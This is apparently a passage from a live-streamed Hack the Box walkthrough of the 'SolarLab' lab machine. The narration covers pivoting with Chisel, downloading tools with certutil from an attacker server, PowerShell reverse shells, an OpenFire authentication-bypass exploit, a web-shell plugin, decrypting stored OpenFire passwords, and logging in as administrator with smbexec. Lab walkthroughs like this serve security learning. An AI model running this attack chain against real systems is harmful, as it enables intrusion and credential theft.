actually got us a login. My only thing was I was just curious about the exploit because I didn't know if the exploit would actually match up because one was called Report Labs, the other was called Report Hub. But essentially, it was doing the same thing. It was generating that PDF document. So I wasn't able to see anything on the back end. So took a leap of faith. It paid off. We'll mark that one as a dude. This guy got the user in 24 minutes. Like if I couldn't even fathom getting that in 24 minutes, and this guy did the route and everything in an hour and 8 minutes. I'm nowhere near that level. They may be using professional tools. I don't know. I'm just happy that I managed to get in so far. So now let's see if we can um, elevate our privileges and find out what we can find out on this machine. So I'll pull this one back over here. Oh, so happy that worked. Alrighty. So there was an application in here. Documents app. Let's go back to that, see if there's anything in this documents app. Because I just did one the other day, and there was actually a list of usernames and passwords within the app. Okay. It's going to be the same thing. So cat users.db. And it looks like we got passwords. I'm starting to catch on to you, Hack the Box. I'm starting to catch on to you. So now I have usernames and passwords. Or all of them? That's crazy. I don't know what that is. That's weird. But... Oh, it's part of the users thing here. Let's see. Facebook's blowing up on me. So I'm trying to think. So we have usernames and passwords, but it may be just to that. Let me see what all's on this system real quick. Who am I slash priv? See what kind of privilege escalation we might have, or permissions, I mean. Nothing crazy. Here we go. So we have Blake, open fire, and administrator. So those passwords may not work. Hmm. Can I go to open fire? Let's see. There's nothing in there. Huh. So there's a user called OpenFire. I don't know what that is. I don't know if that's like a service account of some sort of like one of the programs or something. I don't really know what that is. Let's see. Let's keep looking around. Okay, so there is an OpenFire program. There's also Ruxum. I'm not sure what that is. Let's Google. I keep forgetting I have my thing over here I can use. Let's disable. I'm so used to using Chrome on my standard desktop. Let's see. Ruxum. I don't even know what it is, but we're gonna find out. Ruxum exploits. Reusable UX integration manager. Let's see what this says. Nothing about Ruxum. Huh. What was the other one called? OpenFire? OpenFire authentication bypass. So how do you? Let's check this out real quick. And again, if you guys have any questions any point in time, please feel free to type them in the chat here. I'll answer them as I see them. No such thing as a stupid question. Definitely all learning here. All right, so what is this? A cross-platform real-time collaboration server utilizing the XMPP protocol developed by the Ignite real-time community faces a severe vulnerability within its administrative console. So there's an administrative console for this. So if it, where is that console running? So let's see, netstat-ato. So there's our shell. Amazing. This is why like none of this stuff is, quiet. None of these methods that I'm using is quiet. Any analyst would see that and be like, what the fuck? Especially this port number. They'd be like, yo, what the fuck? Anyway. Uh There's a bunch of internal ports open for basic services. What port does it run on though? I don't see anything. What port? Does it say what port? So they show 9090. Was that open? 9090? Listening? Okay. So it's internal, right? We have the 127.0.0.1 IP address, so it's running internally. So we're gonna actually have to pivot into this machine to access that, right? Which is very simple. They make awesome tools. We could use proxy chains. We could use. I'm probably going to use Chisel. Chisel is like one of my favorite go-to things for pivoting, just because of the ease of use. Let me pull up my notes on how to spin all that up. So we have Notion.so. Let me get to a safe screen, not sharing my OSCP stuff, and we will go into pivoting. And I will need to do Chisel. And so I will copy this. So on the Kali machine, I need to run that command. Paste. Make sure my proxy is set up correctly. So port 1080, completely fine. And we should be good there. Oh wait, I don't have, I should have it. I could have swore I had it on here just a second ago. I did, because I used it for another thing. I don't remember where I saved it though. Downloads. So there's the chisel.exe. I don't know where it went. I had a file, or I thought it was a sh file. Maybe not. There we go. Okay. I had a file of it, but I don't know where I put it. That's funny. Well, at least I found the Windows one that I used previously, so that's in downloads. Alrighty, so now we have that running. Let's go ahead and add Chisel to Foxy Proxy, so that's all good. We will need to set up a reverse, not a, oh, we already have it, Python server running port 8000, that's perfect. Let's grab our shell here. Now what I'm going to do is run a command to reach back to my HTTP server here on port 8000 to essentially grab that chisel.exe. We'll need to go back to CD users, I forget his name, so CD Blake, just so we are able to save that file. We'll save it to his desktop, which normally you would not want to do, but completely fine in this case because we're not trying to be sneaky, right? All right, so I need to transfer that file. Desktop, desktop. No, it was under downloads, wasn't it? Chisel.exe. We'll just go ahead and drop that into our main folder here. So now we can run wget. Does it have wget? Let's see. Might have to run like robocopy or something. And that's why notes come in handy. I think it froze on me. I have to rerun that. Yeah, it's frozen. May have to rerun that exploit. I'll just give it a minute while I look through my notes here. Chisel. I will need to run this command on the Windows machine once I get it. But first, let's go to File Transfers, RoboCopy. Or certutil. Certutil might do it too. Yeah, I think I'll just use certutil. Let me go ahead and cancel that. We'll reopen our listener. Go back through the exploit. This is why persistence is important. I didn't do that in this case. It is what it is. So disable chisel. Let's go ahead and log back in. Link B. Lake B. Grab that password. You know what? Let's just save it just because I have to sign in so many freaking times. All right, now let's go ahead and capture with burp. Intercept is on. Perfect. Grab our pretty picture here because it forces us to. And then I need to grab this. Copy. Let's just make it all quick. Actually, let me grab the whole thing there. Cool. And we need our rev shell generator, PowerShell code here. So we can grab that PowerShell reverse shell. And need to input it here. There we go. So I will copy that. We'll go ahead and hit generate. Come down here, replace this, and then forward. And we should have a reverse shell. If I can find the correct one. There it is. Perfect. Okay. So now let me pull up my notes again. We'll just use certutil. One of those tried and true ones, right? So copy, pasta, HTTP. We have 10.10.16.3 slash chisel.exe. And this should be, there it is. See if this works. Did I type something in wrong? Oh, I did not do port 8000. So certutil URL cache HTTP 10.10.16.3, and that is port 8000 slash chisel.exe. Boom, it got it. It's downloading. We should have it. Just got it twice. And it hung up again. I need a stronger shell. Oh, there we go. Oh, I didn't specify the output. Damn it. Oh, I'm such an idiot. This is going to take a minute. I needed to specify the output because now it's just going through the motions. Where are my notes again? That's hilarious. What was it? It was TAC O. May have to Google this real quick. Cert util. Oh, that's right. Yeah. Okay. So cert util. Copy that. Or actually, cert util URL cache f http 10.10.16.3 port 8000 chisel.exe, and then we will need to save that as chisel.exe. There we go. Now this should work. It's just going to take it a minute. There we go. And now we have chisel.exe. Perfect. So now we can run over to, I had to look that up because I didn't have that on the end. Oh, yes, I did. I need to change my notes here. So we will add uh, saved file name, file, file. Boom. Okay. Had to update the notes there. That's funny. So what are we doing now? We need to pivot, chisel, and then on the Windows machine, we'll run this command. And then now we should be able to connect to the machine using chisel. So we need to go to 127.0.0.1, and that was port 9090. Nope. What's wrong here? Proxy is refusing. Let me check my. Let's check everything here to make sure this is set up right. Oh my god, I'm such an idiot. I didn't update the IP address. I'm like, man, it should have worked. So let me change that back to proxies 5. Because I just used this on a CTF the other day, man. All right, that's good. Let me update that. Because that is definitely not my IP address. We are at 10.10.16.3. Let's try this. And then we should see something here. Something happen here. Should. Maybe not. What am I doing wrong? What am I doing wrong? Something is wrong here. Let me try doing, since we are in PowerShell, try running it like that. Hmm. Hmm. I can't create a session. Why am I not being? So I'm using port 1080. Oh, that's coming back to 8001. I'm using port 8001. Let me try this again. Why is it not executing though? This can get frustrating rather quickly. Dude, I just used this the other day too. I'm pretty sure I used those same commands, so I'm not sure what's happening here. IP address is correct. Maybe it's the version. Maybe it's the version number. Let me see. Let's look up Chisel real quick. Oh, not a wood chisel. Chisel GitHub. That'll work. Oh, fuck. Should have gone to releases. Yeah, because I downloaded this. I just don't remember. So I need the server. I don't remember where I saved it. Oh, fuck. Because I remember they have to be like the same version number or something. Let's see. So we will sudo dpkg-i paste. Oh, this is AMD 64. Whoops. AMD 64. my bad. Let's try that again. Oh, that's Windows. That's what I need. Try this. There we go. So now let me try running those commands. Where did it go? There it is. All right. All right. This is starting to get frustrating. Let me make sure I had the correct Windows 1 2, right? Let's see. So okay, so this is x64. Maybe I just had the wrong version. I don't know. Let's see. Let's close out some of this stuff. Oh man, coming up on 2 hour mark, I'm getting stuck with the pivot. That's all good. Actually, I'll just copy this and paste it. This is good though. I mean, I needed the practice. It's been a long time since I've done some of this stuff. I probably should have removed chisel first, but whatever. Oh, it's already in use there. Okay. Watch it be really, really. There's something really, really stupid as to why this is not working. All right, let me try some different commands that I had for my notes here. Close this. Whoops. Just do port 1, 2, 3, 4. So now it's listening on port 1, 2, 3, 4. And let's try chisel.exe client 10.10.16.3 port 1, 2, 3, 4, and we will reverse that to port 9090 and 127.0.0.1 port 9090. Something is not right here. So let's see. Is there just a chisel file I can download? We'll just extract that. No, still nothing. What in the world? It's like it's not executing, maybe. I don't. Why are you not working? Super, super frustrating. Alright, let me try this then. It's not connecting back. Why is it not connecting back? Trying to see if I can get a different command or command line. Maybe. Did it freeze up again on me? Because I feel like it's just not executing. Like that's what it looks like to me. And it may be because it's in PowerShell, and PowerShell has that script. What do you call it? That you can't run. Protections in place. I forget what you call it. I may have to do a bypass on it. So let's see. Close all that. And close that, open up another thing. We'll run this exploit again. Blake B, log back in. And let's hit it with a proxy. Hit it with burp. Intercept on. Boom, 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 boom. Add our pretty picture. Generate. Let's grab that payload. Catch our shell. All right, so we're back in there. Oh, it looks like it didn't save chisel. That's interesting. Do we have to bypass AMC? See if I can run cmd.exe. Yep, seriously wonder if I need to bypass AMC for this. Let's look through some notes real quick. Hmm. It's odd that it didn't keep it. So I'm wondering if AMC actually deleted it. May have to find another way to get it on there. That would explain why it wasn't working. Let me see if we can go back to this. Yeah, it's fine. So let me try to upload it again. And actually, we'll just use PowerShell to do it this time, since we're already in PowerShell. All right, so let's try this. Run this again. Grab our shell. Okay. So we'll take this command. Where is this? Let me open up another document here. So we'll change our IP address. We're 8,000. We're not using Plink. We are actually using Chisel. And then see users, Lake, documents, app, and chisel.exe. So we have Chisel right there. And Chisel's gone. So it looks like AMC's doing this to us. Let me just try doing it to the Blake drive here. Oh, whoops. Don't need to do that. Where is, let's see, Control A, Control C, or just copy, paste. Oh, I didn't mean to save it there again. I meant to do it just in Blake's thing. Whatever, we'll download it twice. Chisel.exe 10, 10, 16, 3, port 1, 2, 3, 4, reverse 9090, 127.0.0.1, 9090. Run that. Did it work? I don't know. Did not work. Chisel's still there, so that's a good sign. So let me try running it this way. Again, we'll make sure it's still there. Pivoting. Chisel. Paste. Still nothing there. Okay, but it's not being deleted this time, so that's a good sign. We need to actually run the PowerShell bypass. execution policy bypass. That's what I'm Googling right now. Let me just pull this over here. Nope. What is going on here? This is so frustrating. Still nothing. God, this is frustrating. Why is it not reaching out? Let's see what I did wrong here. Let's see. Let me Google some more. Try verbose mode. No, it's like it's not running. Why is it not running? Well, that doesn't help that I keep putting in the wrong IP address too. 10.10.16.3, 8001. 8001 or 1080 sucks. Boy, this is frustrating. Let's see. All right, so I have the executable. The executable's still there. It's still on the machine. Completely fine. But when I run it, it's not reaching back out to my server that I created. So maybe it has something to do with my firewall on Kali. Maybe. So we'll look up some stuff for that. So we'll check out their status. Boom. Cool, cool, cool. So that's good. Run it through IP tables as well. All right. Chisel. Wait, why does it do that? It's just repeating the last command that I did. This is so weird, man. There we go. Holy shit, it finally worked. So I guess it was IP tables not accepting. All right, so now we can actually make some progress here, man. Dear God. Let me go to Chisel now. And let's go to 127.0.0.1 9090. Oh, we already have a tab there. Try again. Hey, and it opens up. We have successfully pivoted. Now, what the hell were we doing? We had something. Okay. So this bypasses the login, apparently. So let's download this code. So we will copy to clipboard. I'm so happy I got that working. That was ridiculous. Basic troubleshooting. I should have started and make sure that my ports and everything were open for it, but whatever. So we will git clone, paste that in there, cd into CVE-2023. What, 3.2? All right, so we have the Python script there. Let's see how this bad boy works. Apparently we just do the URL there and it does it for us. So let's try that. So Python 3 CVE dash 2023 UI, whatever. Okay, and then TAC U for URL, HTTP. We'll do 127.0.0.1 9090. Oh wait, I may need to use proxy chains for this. Um, no, it's 9090. Mm, Let me actually try this. And we'll do 1, 2, 3, 4 as well. I'm gonna try the other one that I was doing for chisel. We don't need that. We definitely don't need that anymore. So we'll go ahead and terminate chisel. May need to re-exploit. All right, so we'll do chisel. We'll do this. Let's go ahead and re-exploit. Need to go back to burp. Try again. Turn that off. So frustrating. I needed to just go ahead and get persistence. I don't know why I'm being lazy. Let's grab our payload. Throw our payload in there. Forward. Let's grab that shell. Why did I not grab that shell? Oh my god, what happened? It logged me out again for some reason. There we go. Grab that shell again. Okay, so now still have chisel. Cool. All right, so now I'm gonna run chisel. Actually, chisel.exe client 10, 10, 16, 3, and we'll run that from port 1, 2, 3, 4, reverse port 9090 from local 127.0.0.1, and then port 9090. There we go. All right, so we're connected there. And that's perfect. I'm gonna close that. Close that. Disable. Now let's see if we can do 127.0.0.1 port 9090. Let's see if we can still connect. We can. Beautiful. No, we can't. Why did it not connect? Mm. Yeah, whatever. Let's try this again. Oh, whoops. I didn't mean to do that. Let's see. Why is it not connecting now? Hmm. All right, this is very, very odd here. I'll try some different ports. I mean, that's weird that it's doing that, but it's still showing up with the index here. Huh, whatever. All right, let me pause that. Damn, this sucks. Pull this back up. We'll pull this back up here. Make us log in again. Come on, you need to log in. There we go. Office request. Intercept on. Alright, let's try. Hmm. Alright, 8001. So new chisel, exe, client, 10, port, what was it? There we go. It worked that time. I guess because I was routing it. I don't know where I was routing it earlier. I just thought I'd try this again, but it worked. Okay. So it created a username and password. So hug me and hug me now. So now we will need to go into the actual login. So chisel, I'll need to change these options. Support 8001 is what I did. There we go. Okay, so now we're all good. Oh, I know what I was doing. Because I didn't have port 8001 set. I had 1080 from a previous one. That's what I was doing wrong. That makes sense. Hopefully I can get through this quick. Starting to get hungry. Pretty sure the wife wants me done. Going on 2 hours and 40 minutes. Alright, so hug me. And hug. I type hug me now. All caps, right? Oh, whoops. Let me just copy that then. Yeah, sure. We'll save it. All right, so we're in OpenFire now. Dear God, that took forever. So let me look up OpenFire exploit. So we did that. Let's see if there's anything else. Okay, so it looks like there's another exploit here. So it says step 1, run the exploit, log in with newly added user. We're there, so we need to go to tab plugin, upload plugin, OpenFire management tool, access web shell with password 123. So let's try that out. Yeah. See if they got pictures. Nope, no pictures. Damn. All right, so go to tab, plugin tab. It says tab plugin. That's funny. Should be plugins tab, right? Let's go to that. Moving at a snail's pace. Maybe someday. That's why right there is because I had the 1080. Oh my god, this is moving so slow. There we go. All right, we're starting to speed up now. Okay, what did it say? Upload plugin. So I assume that's from this download here. Yeah, so we have a, let's see. Just grab those files, so git clone, paste, boom. So then it should be under that folder. Oh, whoops, I need to browse first. Open, upload, plugin uploaded successfully. Okay, what's next? Go to the servers tab. Server settings. Management tool. Management tool. Access web shell with password 123. So 123. Okay. Oh no shit, we can execute commands. See who I am first. So I am the OpenFire person. Or OpenFire account, I mean. Ancient name. Okay. Let me grab. I guess I can just run a PowerShell command again. Reverse shells, online reverse shell. Guess I can just run this again. Sweet. So now we're that Solar Lab OpenFire. So the OpenFire account. Making progress, making progress. All right, so let's look around here. Install 4J, binary, config, documentation, embedded database. Admin at solarlab.htb, so that's okay. Password key. Admin. We look up OpenFire because this is a actually run that again. See, type open fire dot script and make this a little bit easier to read. Trying to look up to see how these are structured or how this database is supposed to be structured. Because I'm seeing a lot of hashes, right? But then there's also base 64 encoded. Got a crack station. Apparently it doesn't know either. So I'm wondering if this is specific to OpenFire. So let's Google some things about OpenFire. Or wait, I can do it over here. OpenFire hashcrack. OpenFire decrypt. Mm, grab that. We'll go ahead and get clone, paste. Okay, how do we use this? I don't have that program. Mm, wait, am I supposed to say Java? Okay, alrighty. Please specify the encrypted password and the password key. So what was the password? I use CrackStation. Wait. So we have this, right? So let's paste. And then we use, where did it say password? What? Password and the password key. What is the password key? Does it say something about a password key? Or if one of those is the password key. One of these. I'm pretty sure this is the hash. Oh, password key. Let's see if that works. This password should do at, or exclamation at. Is that the password? I wish there were pictures with this of like them actually demonstrating it. I think that's the password, so I'll go ahead and add that to our notes here, and this should be admin at this thing 8.htb, so admin. Or administrator. So since we have a password, I don't know where to log in. We could use crackmap exec. I'm wondering if we could we might be able to use the run as command. Let me try that. Let me try to use run as. No, use crack map exec and just see if we can sign in somewhere. SMB was open, so we can see if it's in there. What is the thing called? SolarLab.htb. And let me pull up the notes. It'll be TechU administrator, and then tech key, and then the password in there. There's the password. Paste. Let it run. Okay, so we can sign in through SMB. Close all that. So yeah, it's pwned at SMB. So we'll need to use SMB exec. No, what is it? I gotta look it up real quick. My notes. In packet. There it is. In packet. SMB exec. We'll do administrator. Retor. And then our password. And then at solarlab.htb. This should let us in. Hey, let's go. So we'll go back and grab that flag. Useful path. Okay, so we will go to CD. What is it? I forget how to use this. It's been so long. So I know it's going to be under the root, right? So we will directory C / users administrator / desktop. There it is, root.txt. Okay, so we will type the users administrator desktop root.txt, and we have officially finished this box. Oh man. Let me grab that flag. Copy that. Let's open up our Hack the Box page right here. Submit the flag. Paste. $45 points for that. This was, yeah, oh man, I want to say it was a bit hard, but that was due to my own errors in not typing in the right commands for chisel and the pivoting. I mean, it took me 3 hours for the whole thing, but I'm going to mark it as medium. Like, I don't think it was anything crazy, but a lot of it was just me trying. It has been a while. It's been a very long time for me since I've even done pivoting. So we'll go ahead and submit that. There we go. Cool. Let's check out my profile real quick. That was a pretty fun box. I mean, Windows box had some hiccups, but like I said, I mean, it's been a while. It's been a very long while since I've done majority of this. So definitely a learning thing for me. Why is my profile not pulling up? There we go. So hopefully in the next couple of weeks I'll be able to finally pass that elite hacker. I'll get up to like right here, and then I won't touch this for a very long time. So anyway, if you tuned in, great. I hope you enjoyed. Definitely catch us on another week. And if you ever have any like requests or anything that you want me to demonstrate on these Mr. Robot Mondays, please let me know. I don't mind walking through a lot of this stuff. I'm just generally doing, hack the box so people can kind of get a feel for what it's like to actually hack. But I don't mind doing, other things as well. So please just let me know. Uh, yeah. So I guess I will see you all next Monday.